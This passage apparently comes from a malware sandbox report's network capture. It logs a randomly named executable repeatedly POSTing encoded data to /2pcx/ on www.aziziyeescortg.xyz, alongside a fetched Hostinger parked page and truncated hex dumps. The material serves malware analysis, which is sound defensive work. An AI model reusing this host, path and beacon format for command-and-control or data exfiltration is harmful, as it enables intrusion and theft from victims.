                                                                                x-hcdn-request-id: 43c39181e52e2e649c3f2f077ef660d6-bos-edge4
                                                                                Expires: Sat, 14 Dec 2024 12:52:29 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                Dec 14, 2024 13:52:30.801707983 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                Dec 14, 2024 13:52:30.801719904 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                Dec 14, 2024 13:52:30.801845074 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                Dec 14, 2024 13:52:30.801858902 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                                Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                                Dec 14, 2024 13:52:30.801868916 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                                Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                                Dec 14, 2024 13:52:30.802011013 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                                Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                                Dec 14, 2024 13:52:30.802022934 CET1236INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                                Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                                                Dec 14, 2024 13:52:30.802196980 CET988INData Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                                                Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.550046104.21.77.71806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:36.297832966 CET755OUTPOST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 51 48 74 4e 33 38 6d 4d 62 73 41 36 7a 63 42 55 6d 38 33 47 58 75 34 76 5a 74 37 4f 38 33 30 31 54 37 55 6e 69 37 51 41 71 6c 38 36 42 33 43 31 6a 2f 31 6d 68 4f 39 73 47 4d 78 43 4d 41 4f 43 69 2f 42 54 52 48 77 4f 6a 5a 66 77 52 6d 4d 70 6c 58 6c 72 47 75 35 59 69 6c 4e 6e 4e 50 2f 48 42 45 65 67 2f 2b 45 39 35 66 48 38 70 37 73 67 36 6e 6e 62 51 31 54 47 6a 4c 4d 41 6d 79 35 53 4d 70 6a 76 62 52 65 57 6c 74 77 2f 32 6c 70 47 55 59 58 52 51 4e 44 76 32 70 76 46 32 42 76 67 62 43 52 64 48 53 50 79 50 43 77 55 4b 44 72 4b 67 44 41 51 79 46 37 49 78 32 30 3d
                                                                                Data Ascii: NVK8=btkQLzgK81PCQHtN38mMbsA6zcBUm83GXu4vZt7O8301T7Uni7QAql86B3C1j/1mhO9sGMxCMAOCi/BTRHwOjZfwRmMplXlrGu5YilNnNP/HBEeg/+E95fH8p7sg6nnbQ1TGjLMAmy5SMpjvbReWltw/2lpGUYXRQNDv2pvF2BvgbCRdHSPyPCwUKDrKgDAQyF7Ix20=
                                                                                Dec 14, 2024 13:52:37.562068939 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:37 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha9DQOfp5C7NH0AQiLSigswdBUpueIuDV2Lk8mdy58rGmre%2Blp3%2BUyVgnGnTRM6szHLHF7Bqzu5dwsv1Dzoxey%2BNEYFzhfv%2BOzzy8zxrIa9FokncBRthqreJPx2PWDuKakCId0mHBkzL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5504ac0943d6-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2299&min_rtt=2299&rtt_var=1149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                                                                                Dec 14, 2024 13:52:37.562100887 CET392INData Raw: a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04
                                                                                Data Ascii: bUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.550047104.21.77.71806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:38.965279102 CET775OUTPOST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 43 45 31 54 62 6b 6e 73 66 45 41 72 6c 38 36 4b 58 44 2f 74 66 31 39 68 4f 34 62 47 49 35 43 4d 41 4b 43 69 36 39 54 51 30 5a 38 68 4a 66 79 61 47 4d 72 34 6e 6c 72 47 75 35 59 69 6c 49 43 4e 50 33 48 64 6b 75 67 2b 66 45 2b 30 2f 48 2f 34 37 73 67 2b 6e 6e 41 51 31 54 77 6a 4b 67 36 6d 30 6c 53 4d 6f 54 76 56 6a 6d 56 76 74 77 35 35 46 6f 59 66 62 4b 6f 66 2b 44 41 2b 4b 66 59 32 41 50 4c 54 55 67 33 64 77 48 61 63 69 63 73 61 51 6a 39 78 7a 68 35 6f 6d 72 34 76 68 69 79 6c 52 42 36 6f 76 44 34 71 79 32 50 55 4a 63 6a 2b 7a 42 4d
                                                                                Data Ascii: NVK8=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48CE1TbknsfEArl86KXD/tf19hO4bGI5CMAKCi69TQ0Z8hJfyaGMr4nlrGu5YilICNP3Hdkug+fE+0/H/47sg+nnAQ1TwjKg6m0lSMoTvVjmVvtw55FoYfbKof+DA+KfY2APLTUg3dwHacicsaQj9xzh5omr4vhiylRB6ovD4qy2PUJcj+zBM
                                                                                Dec 14, 2024 13:52:40.212050915 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:40 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPboVlbiIlEiJ77EtGBwuLEPniM%2F9ip%2FaeDZzihrM5c6us%2ByOZAjVBM%2FCuszW6Y3%2B2URMDwYkcIwgSPp6sgLoaibstA0%2FYDU4cBeKEFjNCmjp9aP2rJPrs9Vw7dOhz7L0hZgNKMKCd5x"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e551539ba0f71-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                                                                                Dec 14, 2024 13:52:40.212095022 CET395INData Raw: 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60
                                                                                Data Ascii: DPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUO


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.550048104.21.77.71806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:41.626995087 CET1792OUTPOST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 44 51 31 54 6f 73 6e 73 2b 45 41 35 31 38 36 44 33 44 38 74 66 31 38 68 4f 41 66 47 49 38 2f 4d 43 43 43 77 4d 4a 54 59 6c 5a 38 72 4a 66 79 56 6d 4d 32 6c 58 6b 68 47 75 4a 63 69 6c 34 43 4e 50 33 48 64 6d 47 67 34 4f 45 2b 32 2f 48 38 70 37 73 57 36 6e 6d 4f 51 31 37 67 6a 4b 55 71 6e 48 39 53 4d 49 44 76 5a 32 79 56 6e 74 77 37 2b 46 6f 51 66 62 47 4a 66 2b 66 6d 2b 4c 71 51 32 48 37 4c 43 53 70 74 45 79 62 4e 65 55 63 4b 57 77 44 51 6a 7a 31 36 69 6c 71 58 79 52 58 55 70 53 77 58 2b 61 33 34 76 52 32 48 4f 76 73 50 34 33 34 79 54 49 5a 4f 37 38 2b 4b 2b 4a 54 7a 4a 33 37 54 65 5a 4a 6e 70 35 76 74 6a 59 72 53 52 55 67 48 47 7a 59 53 2f 7a 4e 51 4b 6b 6f 65 36 6f 47 4e 63 6d 77 78 55 73 2b 54 66 4b 72 4c 64 6a 75 4c 6b 41 78 78 76 64 56 6f 4a 54 53 70 38 78 37 54 6a 55 6b 54 38 7a 67 44 39 47 34 4b 71 33 4d 2b 74 34 6b 77 43 6b 51 2b 51 4a 36 52 68 59 41 32 56 [TRUNCATED]
                                                                                Data Ascii: NVK8=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48DQ1Tosns+EA5186D3D8tf18hOAfGI8/MCCCwMJTYlZ8rJfyVmM2lXkhGuJcil4CNP3HdmGg4OE+2/H8p7sW6nmOQ17gjKUqnH9SMIDvZ2yVntw7+FoQfbGJf+fm+LqQ2H7LCSptEybNeUcKWwDQjz16ilqXyRXUpSwX+a34vR2HOvsP434yTIZO78+K+JTzJ37TeZJnp5vtjYrSRUgHGzYS/zNQKkoe6oGNcmwxUs+TfKrLdjuLkAxxvdVoJTSp8x7TjUkT8zgD9G4Kq3M+t4kwCkQ+QJ6RhYA2VU5wwKEHrVrYDBntvZwih5jHkwyUyLK3QaSt0ZF431PUCpJg4dAxH3LtRb3ZXsN6K/p9+L8hVE5MeFw1ZKSiAuZ4HxqlRTo4tmOxJdh2ABW395ZGo/SuRq9iIL4nz3YAr0TzZYVib/FLAJfhdrv73xTj2FtSDT1ED4B+2XQ4+SqIxXPQjqLavhRX3YgXSaF5UD6geSd76/JxgVj/iBR7+0WTDRiS2xvnLi/zQUx9F/UTDEzINdrkgL7IuDB9fzlTw5vMkR9YYjfy6rvTvHa4edc6u8iPG1ZmC25TqSzdRJIsIEanvWxlP2vKwk+mZejieQ+a0Udt/datpuab/W9aFMQ5ABuFE3uZQ831y+zyOPt+NS/TdkI9zM/HPkQikG+uJpbF0o39YYrvAzULzRp/veiwWFw5quG4xCZa8HOhJgs5CeTjLMnUbQ1qE4hTQ2rh4FI4KJxpR5K5RK8UBrddt+zBNapGanBq5ENhj/0dkrYH70Tyk/8d4m/3gvBD26KfIXPaFiL4gx4KDF6lRjHGuvOXO1JZOSemTQsYmNakuWGOKhjiMvVSrvVvsBKOZnX9OB2DLGpcE+Yz6zYefHMLZjLWstllXgrxLIvLBVCKAAxyNuJby9skxx1NlrHKB8rw3uNI9AkGZjIIV+MOwQVTmXoQ6qS/sHw8sz9 [TRUNCATED]
                                                                                Dec 14, 2024 13:52:42.888066053 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:42 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PsuVWMpeJZU9m6kSLOWms1e%2FnnocvBiyxkHoNuL7UhvQ753nQNNZLrtXlm5vjsTae21MMXrhWjYvVWa1ssF9AN0D78IGA1RQuHFY5F6VXZpQ1P4RdPXf8FqVPfd952jtEyhfiSt62X7"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5525eae743bd-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbU
                                                                                Dec 14, 2024 13:52:42.888129950 CET387INData Raw: 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d
